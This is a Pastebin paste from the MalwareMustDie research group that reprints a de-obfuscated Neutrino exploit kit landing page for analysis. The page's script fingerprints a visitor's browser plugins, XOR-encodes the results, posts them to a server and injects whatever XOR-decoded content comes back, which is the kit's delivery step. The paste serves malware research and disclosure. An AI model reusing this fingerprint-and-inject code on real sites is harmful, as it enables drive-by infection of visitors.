MalwareMustDie

#MalwareMustDie -Neutrino EK Landing Page Beautified

Jun 25th, 2013
661
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie!
  2. // Neutrino EK Landing Page Beutified - Where the infection starts!
  3. // Analysis: http://malwaremustdie.blogspot.jp/2013/06/knockin-on-neutrino-exploit-kits-door.html
  4.  
  5. !DOCTYPE HTML>
  6.  <html>
  7.  <head>
  8.  <link href='rcijxziqjmwai.css' rel='stylesheet'
  9.  <link href='ubjabj.css' rel='stylesheet'
  10.  <link href='wqhbu.css' rel='stylesheet'
  11.  <link href='rwkjnnswkreab.css' rel='stylesheet'
  12.  
  13.  <script src='wgyesrof.js'></script>
  14.  <script src='vuofg.js'></script>
  15.  <script src='cqqv.js'></script>
  16.  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
  17.  <link href='czdwbmxdwzzmgbh.css' rel='stylesheet'
  18.  <link href='sejcrxuoimtjnlhp.css' rel='stylesheet'
  19.  <link href='kmmxjptip.css' rel='stylesheet'
  20.  <link href='pqnojry.css' rel='stylesheet'
  21.  <script src='cnvpce.js'></script>
  22.  <script src='aqrwwpb.js'></script>
  23.  <script src='hptkkoyqvzt.js'
  24.  </script><script src='ppkuryqha.js'></script>
  25.  <script type="text/javascript" src="scripts/js/plg.js"></script>
  26.  <script src='blgxhwyvdop.js'></script>
  27.  <script src='zenpzmilbxv.js'></script>
  28.  <script src='oumvvhkwsruznt.js'></script>
  29.  <script src='rhkggotwoffagc.js'></script>
  30.  
  31.  <script type="text/javascript"
  32.  $(document).ready(function()
  33.  {
  34.    var aa = 'gvwuhd';
  35.    var bb = '';
  36.    var cc = aa;
  37.    bb = cc;
  38.    \u0410\u041d602(
  39.    '51c81ff4aaa2cce42c1809bd',
  40.    bb,
  41.    'bxfkxhcqk',
  42.    'rruqytkegrvjt',
  43.    'eefazbuhfeekpb'
  44.    );
  45.  }
  46.  );
  47.  function \u0410\u041d602(a,c,d,b,e)
  48.  {
  49.    a=
  50.    {
  51.      plugins:
  52.      {
  53.        adobe_reader:PluginDetect.getVersion("AdobeReader"),
  54.        java:PluginDetect.getVersion("Java"),
  55.        flash:PluginDetect.getVersion("Flash"),
  56.        quick_time:PluginDetect.getVersion("QuickTime"),
  57.        real_player:PluginDetect.getVersion("RealPlayer"),
  58.        shockwave:PluginDetect.getVersion("Shockwave"),
  59.        silver_light:PluginDetect.getVersion("Silverlight"),
  60.        vlc:PluginDetect.getVersion("VLC"),
  61.        wmp:PluginDetect.getVersion("WMP")
  62.      }
  63.      ,hid:a
  64.    };
  65.    var f=
  66.    {
  67.    };
  68.    f[b]=c;
  69.    f[e]=encodeURIComponent(xor(JSON.stringify(a),c));
  70.    $.post(d,f,function(a)
  71.    {
  72.      $("body").append(xor(decodeURIComponent(a),c))
  73.    }
  74.    )
  75.  }
  76.  function xor(a,c)
  77.  {
  78.    for(var d="",b=0,e=0,b=0;b<a.length;b++)e=Math.floor(b%c.length),d+=String.fromCharCode(a.charCodeAt(b)^c.charCodeAt(e));
  79.    return d
  80.  }
  81.  JSON.stringify=JSON.stringify||function(a)
  82.  {
  83.    var c=typeof a;
  84.    if("object"!=c||null===a)return"string"==c&&(a='"'+a+'"'),String(a);
  85.    var d,b,e=[],f=a&&a.constructor==Array;
  86.    for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
  87.  return(f?"[":"{")+String(e)+(f?"]":"}")
  88.  };
  89.  </script>
  90.  </head>
  91.  <body>
  92.  <img src='rqpnl.png'><img src='ioqcnevjvdtckivg.png'><img src='lxio.png'><img src='fkatvwsdk.gif'
  93.  <img src='mbhiebkokgvhhgfp.png'><img src='aajauexmihvoghpo.jpg'
  94.  </body>
  95.  </html>
  96.  
  97. ---
  98. "We wacked you good - Neutrino moronz.
  99. #MalwareMustDie! @unixfreaxjp ~]# date
  100. Tue Jun 25 20:31:03 JST 2013
RAW Paste Data